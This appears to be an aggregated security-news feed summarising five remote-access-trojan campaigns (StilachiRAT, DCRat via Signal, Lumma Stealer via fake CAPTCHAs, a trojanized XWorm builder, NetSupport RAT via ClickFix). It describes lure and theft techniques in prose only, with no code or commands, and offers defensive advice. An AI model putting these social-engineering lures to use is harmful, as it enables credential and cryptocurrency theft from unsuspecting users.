Microsoft Incident@Microsoft Security Blog
// 19d
Microsoft's Incident Response team has uncovered a novel remote access trojan (RAT) named StilachiRAT, which employs sophisticated techniques to evade detection and steal sensitive data. Discovered in November 2024, StilachiRAT demonstrates advanced methods to remain undetected, persist in the targeted environment, and exfiltrate valuable information. The malware is capable of gathering system information, stealing credentials stored in browsers, targeting cryptocurrency wallets, and using command-and-control connectivity for remote execution.
The RAT scans for configuration data of 20 different cryptocurrency wallet extensions for the Google Chrome browser and extracts credentials from the browser, indicating its focus on cryptocurrency theft and credential compromise. It establishes communication with remote command-and-control (C2) servers to execute commands, manipulate registry settings, and clear logs, making it challenging to detect and remove. Microsoft advises users to download software from official sources, use web browsers with SmartScreen support, and enable Safe Links and Safe Attachments for Office 365 to prevent StilachiRAT infections. Recommended read:
References :
do son@securityonline.info
// 17d
Cybercriminals are actively exploiting the Signal messaging application to distribute an information-stealing Remote Access Trojan (RAT), raising serious privacy concerns. According to a recently published report, a cybercriminal group identified as UNC-200 is behind the campaign, which involves targeting high-value individuals within Ukraine's defense sector. The Computer Emergency Response Team of Ukraine (CERT-UA) has issued warnings about this campaign, which utilizes the Dark Crystal RAT (aka DCRat) to compromise systems.
This malicious activity involves distributing messages via Signal that contain what appears to be meeting minutes. These messages are sent from compromised accounts to enhance credibility, enticing unsuspecting users to download malicious archive files. The archives contain a decoy PDF and an executable that deploys the DCRat malware, giving attackers remote access and control, stealing valuable information and executing arbitrary commands. CERT-UA attributes this activity to UAC-0200, active since summer 2024, who noted that the use of popular messengers increases the attack surface, including due to the creation of uncontrolled information exchange channels. Recommended read:
References :
@www.infosecurity-magazine.com
// 14d
Attackers are exploiting user familiarity with CAPTCHAs to distribute the Lumma Stealer RAT (Remote Access Trojan) via malicious PowerShell commands, according to recent findings. These campaigns involve tricking users into running PowerShell commands that ultimately install the Lumma Stealer. Attackers direct potential victims to attacker-controlled sites and prompt them to complete fake authentication challenges. These challenges often involve directing potential victims to malicious websites where they are prompted to complete verification steps, but instead of a CAPTCHA, it instructs them to press Windows + R and run a PowerShell command—under the false pretense of running “Windows Defender.”
These attacks leverage weaponized CAPTCHAs, with users being directed to malicious websites where they are prompted to complete verification steps. Upon completing these steps, users inadvertently copy and run PowerShell scripts that download and install malware, such as the Lumma Stealer. This allows the attackers to steal sensitive data like cryptocurrency wallets. The exploitation involves fake Cloudflare verification prompts, which lead users to execute malicious PowerShell commands to install the LummaStealer Trojan through infected WordPress sites, posing a significant threat. Recommended read:
References :
@www.bleepingcomputer.com
// 69d
A sophisticated cyberattack has successfully targeted low-skilled hackers, often referred to as "script kiddies," by using a modified version of the XWorm RAT builder. This fake builder, disguised as a tool for penetration testing, secretly infects the user's systems with a backdoor. This allowed the attacker to compromise over 18,000 devices worldwide. The malware was distributed via various channels including file-sharing services, Github repositories, Telegram channels, and even Youtube. Once installed, the malicious software exfiltrated sensitive data such as browser credentials, Discord tokens, Telegram data, and system information.
The campaign highlights the risks faced even by those attempting to engage in hacking activities. Threat actors, using aliases such as “@shinyenigma” and “@milleniumrat", have taken advantage of the eagerness of these individuals to download and utilize tools from online tutorials. The infected machines are located in Russia, the United States, India, Ukraine, and Turkey. The malicious tool utilizes Telegram for its command and control, using bot tokens and Telegram API calls. Security researchers have identified a kill switch to disrupt operations on active devices, though this is limited by offline machines and rate limiting mechanisms. Recommended read:
References :
@www.esentire.com
// 54d
The eSentire Threat Intelligence team has observed a significant surge in the use of the NetSupport Remote Access Trojan (RAT) since January 2025. This increase is linked to attacks utilizing the emerging "ClickFix" initial access vector, a social engineering technique where users are tricked into executing malicious PowerShell commands. This RAT grants attackers full control over compromised systems, enabling them to monitor screens, control input devices like keyboard and mouse, upload and download files, and execute further malicious commands.
This surge includes a malvertising campaign distributing a fake Cisco AnyConnect installer containing the NetSupport RAT. The RAT, originally a legitimate IT support tool named NetSupport Manager since 1989, has been weaponized by cybercriminals. If left undetected, NetSupport RAT can lead to advanced threats, including ransomware attacks, compromising sensitive data, and disrupting business operations. Organizations are recommended to validate their security controls and educate users on common initial access techniques, such as ClickFix. eSentire MDR for Network and Endpoint detects NetSupport RAT activity and the eSentire Threat Response Unit is performing threat hunts for known Indicators of Compromise across customer environments. IP addresses associated with real-world attacks are blocked via the eSentire Global Block List and additional Indicators of Compromise have been added to the eSentireThreat Intelligence Feed. The eSentire Tactical Threat Response (TTR) team has developed detections for the Clickfix IAV in eSentire MDR for Network. Recommended read:
References :
|